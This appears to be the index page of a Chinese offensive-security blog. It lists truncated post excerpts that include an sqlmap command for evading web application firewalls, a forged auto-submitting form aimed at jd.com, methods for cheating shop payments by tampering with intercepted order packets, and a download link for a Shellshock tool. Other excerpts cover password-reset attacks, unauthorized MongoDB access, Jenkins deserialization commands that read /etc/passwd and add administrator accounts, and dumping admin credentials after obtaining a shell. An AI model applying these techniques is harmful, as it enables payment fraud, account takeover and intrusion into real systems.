SQLMAP绕WAF注入tamper插件
SQLMAP绕WAF注入tamper插件python sqlmap/sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper "space2morehash.py"...
浏览器漏洞研究思路
<form action="https://wwww.jd.com" target="1" method="post" onsubmit="setTimeout('go()', 1);" id="2"><input type="submit"></input></form><script&...
商城支付漏洞三种方法
商城支付漏洞三种方法 商城支付漏洞三种方法1,订单数,修改为负数 -1 看看返回2,提交订单时,抓取数据包,把当前金额改成0.1元,然后提交3,大面积购买数量 如100个数量,提交时抓取数据包,把数量改为100个 配合0.1元思路,实际上你只购买了1个手机,但你缺提交了100个手机,而支付金额0.1x10=1元...
GNU BASH漏洞远程检测工具(CVE-2014-6271)
GNU BASH漏洞远程检测工具(CVE-2014-6271)http://pan.baidu.com/s/1qWrzzHU 密码: d22q...
任意密码重置科普篇
任意密码重置科普篇我们就拿https://www.xbankd.com作为例子来讲一般来说,任意密码重置,首先是13888888888 所谓的土豪金账号测试然后,我们注册一个用户,观察验证方式https://www.xbankd.com/password/verifyusername.html比如忘记密码功能我们随便定义1个可能存在的用户,如123456,TEST,ADMIN一般我们采取前两种,这里,有几种研究方法1,首先我们注册的用户,给我们发忘记密码,验证,接着攻击的用户...
MongoVUE 客户端工具下载
MongoVUE 客户端工具下载官网:http://www.mongovue.com/测试Mongodb数据库未授权访问用的默认端口:27017 28017...
Jenkins CommonCollections win-linux
Jenkins CommonCollections win-linux运行好可以直接执行 CMD命令命令用法:linux println "cat etc/passwd".execute().text 需要配合SSH反弹WIN println "net localgroup administrators xxx/add".execute().te...
特定环境下的后台密码获取思路
一般来说我们拿到了SHELL但是后台密码我们猜不到是多少就算是有注入,我们猜解的时候发现拦截这时候,我们在后台源码处找寻数据库失败情况下,我们该怎么做,才能获得这个后台的密码呢这里我就分享一种思路我们首先得找到,1433,或者MYSQL的密码然后连接1433数据库利用select top 100 * from 这里就填写当前我们需要去攻击的表 order by newid()随机取100条记录包括管理员登陆LOG,等等~~~~~~...